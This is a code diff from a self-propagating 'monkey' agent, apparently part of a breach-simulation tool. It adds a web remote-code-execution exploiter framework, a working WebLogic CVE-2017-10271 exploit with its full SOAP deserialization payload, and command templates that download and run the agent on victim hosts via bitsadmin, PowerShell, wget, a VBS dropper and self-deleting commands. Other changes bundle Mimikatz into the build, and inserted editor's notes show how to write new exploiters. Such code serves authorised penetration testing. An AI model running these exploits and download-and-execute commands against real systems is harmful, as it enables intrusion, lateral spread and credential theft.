+        httpd = LockedHTTPServer(local_ip, local_port, src_path, lock)
+        httpd.start()
+        lock.acquire()
+
+        return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
+

 def get_interface_to_target(dst):
     if sys.platform == "win32":
@@ -405,7 +434,7 @@ def get_interface_to_target(dst):
     for d, m, gw, i, a in routes:
         aa = atol(a)
         if aa == dst:
-            pathes.append((0xffffffffL, ("lo", a, "0.0.0.0")))
+            pathes.append((0xffffffff, ("lo", a, "0.0.0.0")))
         if (dst & m) == (d & m):
             pathes.append((m, (i, a, gw)))
     if not pathes:
@@ -471,13 +500,33 @@ def build_monkey_commandline(target_host, depth, location=None):
                                               GUID, target_host.default_tunnel, target_host.default_server, depth, location)


-def get_binaries_dir_path():
-    if getattr(sys, 'frozen', False):
-        return sys._MEIPASS
-    else:
-        return os.path.dirname(os.path.abspath(__file__))
-
-
 def get_monkey_depth():
     from config import WormConfiguration
     return WormConfiguration.depth


+def get_monkey_dest_path(url_to_monkey):
+    """
+    Gets destination path from monkey's source url.
+    :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
+    :return: Corresponding monkey path from configuration
+    """
+    from config import WormConfiguration
+    if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
+        LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
+        return False
+    try:
+        if 'linux' in url_to_monkey:
+            return WormConfiguration.dropper_target_path_linux
+        elif 'windows-32' in url_to_monkey:
+            return WormConfiguration.dropper_target_path_win_32
+        elif 'windows-64' in url_to_monkey:
+            return WormConfiguration.dropper_target_path_win_64
+        else:
+            LOG.error("Could not figure out what type of monkey server was trying to upload, "
+                      "thus destination path can not be chosen.")
+            return False
+    except AttributeError:
+        LOG.error("Seems like monkey's source configuration property names changed. "
+                  "Can not get destination path to upload monkey")
+        return False
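Editor's note: create_locked_transfer above relies on a small handshake: the caller acquires a Lock, hands it to the server thread, and blocks on a second acquire until the thread releases it once it is actually listening. A stripped-down sketch of that pattern (DummyServer stands in for LockedHTTPServer, which is not shown in this diff):

import threading
import time

class DummyServer(threading.Thread):
    """Stands in for LockedHTTPServer: releases the lock once it is ready."""
    def __init__(self, lock):
        super(DummyServer, self).__init__()
        self.daemon = True
        self._lock = lock

    def run(self):
        time.sleep(0.1)          # pretend to bind the socket and start serving
        self._lock.release()     # signal the caller that startup is finished
        # ... serve requests ...

lock = threading.Lock()
lock.acquire()                   # caller takes the lock while the server is not ready
server = DummyServer(lock)
server.start()
lock.acquire()                   # blocks here until run() releases it
print("server is up, safe to trigger the download")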

View File

@@ -0,0 +1,479 @@
import logging

from exploit import HostExploiter
from model import *
from posixpath import join
import re
from abc import abstractmethod
from exploit.tools import get_target_monkey, get_monkey_depth, build_monkey_commandline, HTTPTools
from network.tools import check_tcp_port, tcp_port_to_service

__author__ = 'VakarisZ'

LOG = logging.getLogger(__name__)

# Command used to check if monkeys already exists
LOOK_FOR_FILE = "ls %s"
POWERSHELL_NOT_FOUND = "owershell is not recognized"
# Constants used to refer to windows architectures( used in host.os['machine'])
WIN_ARCH_32 = "32"
WIN_ARCH_64 = "64"


class WebRCE(HostExploiter):
    def __init__(self, host, monkey_target_paths=None):
        """
        :param host: Host that we'll attack
        :param monkey_target_paths: Where to upload the monkey at the target host system.
        Dict in format {'linux': '/tmp/monkey.sh', 'win32': './monkey32.exe', 'win64':... }
        """
        super(WebRCE, self).__init__(host)
        self._config = __import__('config').WormConfiguration
        if monkey_target_paths:
            self.monkey_target_paths = monkey_target_paths
        else:
            self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux,
                                        'win32': self._config.dropper_target_path_win_32,
                                        'win64': self._config.dropper_target_path_win_64}
        self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
        self.skip_exist = self._config.skip_exploit_if_file_exist
        self.vulnerable_urls = []

    def get_exploit_config(self):
        """
        Method that creates a dictionary of configuration values for exploit
        :return: configuration dict
        """
        exploit_config = dict()
        # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
        # it's file to the default destination path.
        exploit_config['dropper'] = False
        # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
        # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
        exploit_config['upload_commands'] = None
        # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
        exploit_config['url_extensions'] = None
        # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
        exploit_config['stop_checking_urls'] = False
        # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
        exploit_config['blind_exploit'] = False
        return exploit_config

    def exploit_host(self):
        """
        Method that contains default exploitation workflow
        :return: True if exploited, False otherwise
        """
        # We get exploit configuration
        exploit_config = self.get_exploit_config()
        # Get open ports
        ports = self.get_ports_w(self.HTTP, ["http"])
        if not ports:
            return False
        # Get urls to try to exploit
        urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
        self.add_vulnerable_urls(urls, exploit_config['stop_checking_urls'])
        if not self.vulnerable_urls:
            return False
        # Skip if monkey already exists and this option is given
        if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.vulnerable_urls[0]):
            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
            return True
        # Check for targets architecture (if it's 32 or 64 bit)
        if not exploit_config['blind_exploit'] and not self.set_host_arch(self.vulnerable_urls[0]):
            return False
        # Upload the right monkey to target
        data = self.upload_monkey(self.vulnerable_urls[0], exploit_config['upload_commands'])
        if data is False:
            return False
        # Change permissions to transform monkey into executable file
        if self.change_permissions(self.vulnerable_urls[0], data['path']) is False:
            return False
        # Execute remote monkey
        if self.execute_remote_monkey(self.vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
            return False
        return True

    @abstractmethod
    def exploit(self, url, command):
        """
        A reference to a method which implements web exploit logic.
        :param url: Url to send malicious packet to. Format: [http/https]://ip:port/extension.
        :param command: Command which will be executed on remote host
        :return: RCE's output/True if successful or False if failed
        """
        raise NotImplementedError()

    def get_open_service_ports(self, port_list, names):
        """
        :param port_list: Potential ports to exploit. For example _config.HTTP_PORTS
        :param names: [] of service names. Example: ["http"]
        :return: Returns all open ports from port list that are of service names
        """
        candidate_services = {}
        candidate_services.update({
            service: self.host.services[service] for service in self.host.services if
            (self.host.services[service] and self.host.services[service]['name'] in names)
        })
        valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if
                       tcp_port_to_service(port) in candidate_services]
        return valid_ports

    def check_if_port_open(self, port):
        is_open, _ = check_tcp_port(self.host.ip_addr, port)
        if not is_open:
            LOG.info("Port %d is closed on %r, skipping", port, self.host)
            return False
        return True

    def get_command(self, path, http_path, commands):
        try:
            if 'linux' in self.host.os['type']:
                command = commands['linux']
            else:
                command = commands['windows']
            # Format command
            command = command % {'monkey_path': path, 'http_path': http_path}
        except KeyError:
            LOG.error("Provided command is missing/bad for this type of host! "
                      "Check upload_monkey function docs before using custom monkey's upload commands.")
            return False
        return command

    def check_if_exploitable(self, url):
        """
        Checks if target is exploitable by interacting with url
        :param url: Url to exploit
        :return: True if exploitable and false if not
        """
        try:
            resp = self.exploit(url, CHECK_COMMAND)
            if resp is True:
                return True
            elif resp is not False and ID_STRING in resp:
                return True
            else:
                return False
        except Exception as e:
            LOG.error("Host's exploitability check failed due to: %s" % e)
            return False

    def build_potential_urls(self, ports, extensions=None):
        """
        :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
        Eg. ports: [[80, False], [443, True]]
        :param extensions: What subdirectories to scan. www.domain.com[/extension]
        :return: Array of url's to try and attack
        """
        url_list = []
        if extensions:
            extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
        else:
            extensions = [""]
        for port in ports:
            for extension in extensions:
                if port[1]:
                    protocol = "https"
                else:
                    protocol = "http"
                url_list.append(join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension))
        if not url_list:
            LOG.info("No attack url's were built")
        return url_list

    def add_vulnerable_urls(self, urls, stop_checking=False):
        """
        Gets vulnerable url(s) from url list
        :param urls: Potentially vulnerable urls
        :param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
        :return: None (we append to class variable vulnerable_urls)
        """
        for url in urls:
            if self.check_if_exploitable(url):
                self.vulnerable_urls.append(url)
                if stop_checking:
                    break
        if not self.vulnerable_urls:
            LOG.info("No vulnerable urls found, skipping.")
        # We add urls to param used in reporting
        self._exploit_info['vulnerable_urls'] = self.vulnerable_urls

    def get_host_arch(self, url):
        """
        :param url: Url for exploiter to use
        :return: Machine architecture string or false. Eg. 'i686', '64', 'x86_64', ...
        """
        if 'linux' in self.host.os['type']:
            resp = self.exploit(url, GET_ARCH_LINUX)
            if resp:
                # Pulls architecture string
                arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
                try:
                    arch = arch.group(1)
                except AttributeError:
                    LOG.error("Looked for linux architecture but could not find it")
                    return False
                if arch:
                    return arch
                else:
                    LOG.info("Could not pull machine architecture string from command's output")
                    return False
            else:
                return False
        else:
            resp = self.exploit(url, GET_ARCH_WINDOWS)
            if resp:
                if "64-bit" in resp:
                    return WIN_ARCH_64
                else:
                    return WIN_ARCH_32
            else:
                return False

    def check_remote_monkey_file(self, url, path):
        command = LOOK_FOR_FILE % path
        resp = self.exploit(url, command)
        if 'No such file' in resp:
            return False
        else:
            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
            return True

    def check_remote_files(self, url):
        """
        :param url: Url for exploiter to use
        :return: True if at least one file is found, False otherwise
        """
        paths = []
        if 'linux' in self.host.os['type']:
            paths.append(self.monkey_target_paths['linux'])
        else:
            paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']])
        for path in paths:
            if self.check_remote_monkey_file(url, path):
                return True
        return False

    # Wrapped functions:
    def get_ports_w(self, ports, names):
        """
        Get ports wrapped with log
        :param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
        :param names: [] of service names. Example: ["http"]
        :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
        """
        ports = self.get_open_service_ports(ports, names)
        if not ports:
            LOG.info("All default web ports are closed on %r, skipping", self.host)
            return False
        else:
            return ports

    def set_host_arch(self, url):
        arch = self.get_host_arch(url)
        if not arch:
            LOG.error("Couldn't get host machine's architecture")
            return False
        else:
            self.host.os['machine'] = arch
            return True

    def run_backup_commands(self, resp, url, dest_path, http_path):
        """
        If you need multiple commands for the same os you can override this method to add backup commands
        :param resp: Response from base command
        :param url: Vulnerable url
        :param dest_path: Where to upload monkey
        :param http_path: Where to download monkey from
        :return: Command's response (same response if backup command is not needed)
        """
        if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
            LOG.info("Powershell not found in host. Using bitsadmin to download.")
            backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
            resp = self.exploit(url, backup_command)
        return resp

    def upload_monkey(self, url, commands=None):
        """
        :param url: Where exploiter should send it's request
        :param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
        Command must have "monkey_path" and "http_path" format parameters.
        :return: {'response': response/False, 'path': monkeys_path_in_host}
        """
        LOG.info("Trying to upload monkey to the host.")
        if not self.host.os['type']:
            LOG.error("Unknown target's os type. Skipping.")
            return False
        paths = self.get_monkey_paths()
        if not paths:
            return False
        # Create server for http download and wait for it's startup.
        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
        if not http_path:
            LOG.debug("Exploiter failed, http transfer creation failed.")
            return False
        LOG.info("Started http server on %s", http_path)
        # Choose command:
        if not commands:
            commands = {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}
        command = self.get_command(paths['dest_path'], http_path, commands)

        resp = self.exploit(url, command)
        resp = self.run_backup_commands(resp, url, paths['dest_path'], http_path)

        http_thread.join(DOWNLOAD_TIMEOUT)
        http_thread.stop()
        LOG.info("Uploading process finished")
        # If response is false exploiter failed
        if resp is False:
            return resp
        else:
            return {'response': resp, 'path': paths['dest_path']}

    def change_permissions(self, url, path, command=None):
        """
        Method for linux hosts. Makes monkey executable
        :param url: Where to send malicious packets
        :param path: Path to monkey on remote host
        :param command: Formatted command for permission change or None
        :return: response, False if failed and True if permission change is not needed
        """
        LOG.info("Changing monkey's permissions")
        if 'windows' in self.host.os['type']:
            LOG.info("Permission change not required for windows")
            return True
        if not command:
            command = CHMOD_MONKEY % {'monkey_path': path}
        try:
            resp = self.exploit(url, command)
        except Exception as e:
            LOG.error("Something went wrong while trying to change permission: %s" % e)
            return False
        # If exploiter returns True / False
        if type(resp) is bool:
            LOG.info("Permission change finished")
            return resp
        # If exploiter returns command output, we can check for execution errors
        if 'Operation not permitted' in resp:
            LOG.error("Missing permissions to make monkey executable")
            return False
        elif 'No such file or directory' in resp:
            LOG.error("Could not change permission because monkey was not found. Check path parameter.")
            return False
        LOG.info("Permission change finished")
        return resp

    def execute_remote_monkey(self, url, path, dropper=False):
        """
        This method executes remote monkey
        :param url: Where to send malicious packets
        :param path: Path to monkey on remote host
        :param dropper: Should remote monkey be executed with dropper or with monkey arg?
        :return: Response or False if failed
        """
        LOG.info("Trying to execute remote monkey")
        # Get monkey command line
        if dropper and path:
            # If dropper is chosen we try to move monkey to default location
            default_path = self.get_default_dropper_path()
            if default_path is False:
                return False
            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
            command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
        else:
            monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
            command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}

        try:
            resp = self.exploit(url, command)
            # If exploiter returns True / False
            if type(resp) is bool:
                LOG.info("Execution attempt successfully finished")
                return resp
            # If exploiter returns command output, we can check for execution errors
            if 'is not recognized' in resp or 'command not found' in resp:
                LOG.error("Wrong path chosen or other process already deleted monkey")
                return False
            elif 'The system cannot execute' in resp:
                LOG.error("System could not execute monkey")
                return False
        except Exception as e:
            LOG.error("Something went wrong when trying to execute remote monkey: %s" % e)
            return False

        LOG.info("Execution attempt finished")
        return resp

    def get_monkey_upload_path(self, url_to_monkey):
        """
        Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
        :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
        :return: Corresponding monkey path from self.monkey_target_paths
        """
        if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
            LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
            return False
        try:
            if 'linux' in url_to_monkey:
                return self.monkey_target_paths['linux']
            elif 'windows-32' in url_to_monkey:
                return self.monkey_target_paths['win32']
            elif 'windows-64' in url_to_monkey:
                return self.monkey_target_paths['win64']
            else:
                LOG.error("Could not figure out what type of monkey server was trying to upload, "
                          "thus destination path can not be chosen.")
                return False
        except KeyError:
            LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize "
                      "custom dict of monkey's destination paths")
            return False

    def get_monkey_paths(self):
        """
        Gets local (used by server) and destination (where to download) paths.
        :return: dict of source and destination paths
        """
        src_path = get_target_monkey(self.host)
        if not src_path:
            LOG.info("Can't find suitable monkey executable for host %r", self.host)
            return False
        # Determine which destination path to use
        dest_path = self.get_monkey_upload_path(src_path)
        if not dest_path:
            return False
        return {'src_path': src_path, 'dest_path': dest_path}

    def get_default_dropper_path(self):
        """
        Gets default dropper path for the host.
        :return: Default monkey's destination path for corresponding host or False if failed.
        E.g. config.dropper_target_path_linux(/tmp/monkey.sh) for linux host
        """
        if not self.host.os.get('type') or (self.host.os['type'] != 'linux' and self.host.os['type'] != 'windows'):
            LOG.error("Target's OS was either unidentified or not supported. Aborting")
            return False
        if self.host.os['type'] == 'linux':
            return self._config.dropper_target_path_linux
        if self.host.os['type'] == 'windows':
            try:
                if self.host.os['machine'] == WIN_ARCH_64:
                    return self._config.dropper_target_path_win_64
            except KeyError:
                LOG.debug("Target's machine type was not set. Using win-32 dropper path.")
            return self._config.dropper_target_path_win_32
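Editor's note: to make the intended extension points concrete, here is a minimal, hypothetical WebRCE subclass. It only overrides exploit() and tweaks get_exploit_config(), and inherits the whole upload/chmod/execute workflow from exploit_host() above; the HTTP request shape is invented for illustration and is not part of the commit:

import requests

from exploit.web_rce import WebRCE


class ExampleRCEExploiter(WebRCE):
    """Hypothetical exploiter: assumes the target exposes a /run endpoint that
    executes the body of a POST request and echoes its output."""
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
        super(ExampleRCEExploiter, self).__init__(host)

    def get_exploit_config(self):
        exploit_config = super(ExampleRCEExploiter, self).get_exploit_config()
        exploit_config['url_extensions'] = ['run']   # probe http(s)://ip:port/run
        exploit_config['stop_checking_urls'] = True  # first vulnerable url is enough
        return exploit_config

    def exploit(self, url, command):
        # WebRCE calls this with CHECK_COMMAND first, then with the upload,
        # chmod and run commands; returning the command output lets the base
        # class grep it for ID_STRING and error strings.
        try:
            return requests.post(url, data=command, timeout=10).text
        except requests.RequestException:
            return False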

View File

@ -0,0 +1,197 @@
# Exploit based of:
# Kevin Kirsche (d3c3pt10n)
# https://github.com/kkirsche/CVE-2017-10271
# and
# Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# CVE: CVE-2017-10271
from requests import post, exceptions
from web_rce import WebRCE
from exploit.tools import get_free_tcp_port, get_interface_to_target
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading
import logging
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds
SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"]
# Malicious request's headers:
HEADERS = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
}
class WebLogicExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host):
super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey32.exe',
'win64': 'monkey64.exe'})
def get_exploit_config(self):
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
exploit_config['blind_exploit'] = True
exploit_config['stop_checking_urls'] = True
exploit_config['url_extensions'] = URLS
return exploit_config
def exploit(self, url, command):
if 'linux' in self.host.os['type']:
payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
else:
payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
print('[!] Connection Error')
print(e)
return True
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0
def _start_http_server(self):
"""
Starts custom http server that waits for GET requests
:return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
"""
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def _stop_http_server(self, httpd, lock):
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
@staticmethod
def get_exploit_payload(cmd_base, cmd_opt, command):
"""
Formats the payload used in exploiting weblogic servers
:param cmd_base: What command prompt to use eg. cmd
:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
:param command: command itself
:return: Formatted payload
"""
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
return payload
@staticmethod
def get_test_payload(ip, port):
"""
Gets payload used for testing whether weblogic server is vulnerable
:param ip: Server's IP
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{host}:{port}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(host=ip, port=port)
return payload
class IndicationHTTPServer(threading.Thread):
"""
        HTTP server that waits for GET requests. Because the Oracle WebLogic vulnerability is blind,
        we determine exploitability by whether or not the target host sends a GET request back to us.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True
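A minimal usage sketch of the flow above (illustrative only; the victim host, endpoint URL and command are hypothetical examples, not values taken from this commit): check_if_exploitable() starts the local IndicationHTTPServer, sends get_test_payload() to the target, and treats a callback GET request as proof of vulnerability before exploit() posts the real payload.
# Hypothetical driver code, assuming 'victim' is a VictimHost produced by the scanner
exploiter = WebLogicExploiter(victim)
url = 'http://10.0.0.5:7001/wls-wsat/CoordinatorPortType'  # example endpoint derived from the url_extensions (URLS) list
if exploiter.check_if_exploitable(url):
    exploiter.exploit(url, 'wget -O /tmp/monkey.sh http://10.0.0.1:5000/monkey')  # example command only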

View File

@ -0,0 +1,31 @@
from host import VictimHost
__author__ = 'itamar'
MONKEY_ARG = "m0nk3y"
DROPPER_ARG = "dr0pp3r"
ID_STRING = "M0NK3Y3XPL0ITABLE"
DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
# Commands used to check for architecture and if machine is exploitable
CHECK_COMMAND = "echo %s" % ID_STRING
# Architecture checking commands
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
GET_ARCH_LINUX = "lscpu"
DOWNLOAD_TIMEOUT = 300
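A quick illustration of how these templates are meant to be rendered (the path below is a made-up example): the doubled %% survives the module-level substitution of MONKEY_ARG, leaving a normal %(monkey_path)s placeholder for the exploiter to fill in later.
# Illustrative only; the 'monkey_path' value is an example
cmd = MONKEY_CMDLINE_WINDOWS % {'monkey_path': r'C:\Windows\temp\monkey64.exe'}
# cmd == 'cmd /c C:\Windows\temp\monkey64.exe m0nk3y'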

View File

@ -29,7 +29,7 @@ class VictimHost(object):
        return self.ip_addr.__cmp__(other.ip_addr)
    def __repr__(self):
-        return "<VictimHost %s>" % self.ip_addr
+        return "VictimHost({0!r})".format(self.ip_addr)
    def __str__(self):
        victim = "Victim Host %s: " % self.ip_addr
@ -39,7 +39,7 @@ class VictimHost(object):
        victim += "] Services - ["
        for k, v in self.services.items():
            victim += "%s-%s " % (k, v)
-        victim += ']'
+        victim += '] '
        victim += "target monkey: %s" % self.monkey_exe
        return victim

View File

@ -12,6 +12,7 @@ from control import ControlClient
from model import DELAY_DELETE_CMD
from network.firewall import app as firewall
from network.network_scanner import NetworkScanner
from six.moves import xrange
from system_info import SystemInfoCollector
from system_singleton import SystemSingleton
from windows_upgrader import WindowsUpgrader

View File

@ -1,22 +1,30 @@
# -*- mode: python -*-
import os
import platform
# Name of zip file in monkey. That's the name of the file in the _MEI folder
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
def get_mimikatz_zip_path():
    if platform.architecture()[0] == "32bit":
        return '.\\bin\\mk32.zip'
    else:
        return '.\\bin\\mk64.zip'
a = Analysis(['main.py'],
             pathex=['.', '..'],
             hiddenimports=['_cffi_backend', 'queue'],
             hookspath=None,
             runtime_hooks=None)
a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
-if platform.system().find("Windows")>= 0:
+if platform.system().find("Windows") >= 0:
    a.datas = [i for i in a.datas if i[0].find('Include') < 0]
-    if platform.architecture()[0] == "32bit":
-        a.binaries += [('mk.dll', '.\\bin\\mk32.dll', 'BINARY')]
-    else:
-        a.binaries += [('mk.dll', '.\\bin\\mk64.dll', 'BINARY')]
+    a.datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
pyz = PYZ(a.pure)
exe = EXE(pyz,
@ -28,4 +36,5 @@ exe = EXE(pyz,
          debug=False,
          strip=None,
          upx=True,
-          console=True , icon='monkey.ico')
+          console=True,
+          icon='monkey.ico')

View File

@ -27,3 +27,4 @@ from elasticfinger import ElasticFinger
from mysqlfinger import MySQLFinger
from info import local_ips
from info import get_free_tcp_port
from mssql_fingerprint import MSSQLFinger

View File

@ -10,6 +10,11 @@ from subprocess import check_output
from random import randint
from common.network.network_range import CidrRange
try:
    long        # Python 2
except NameError:
    long = int  # Python 3
def get_host_subnets():
    """
@ -93,8 +98,8 @@ else:
            ifaddr = socket.inet_ntoa(ifreq[20:24])
        else:
            continue
-        routes.append((socket.htonl(long(dst, 16)) & 0xffffffffL,
-                       socket.htonl(long(msk, 16)) & 0xffffffffL,
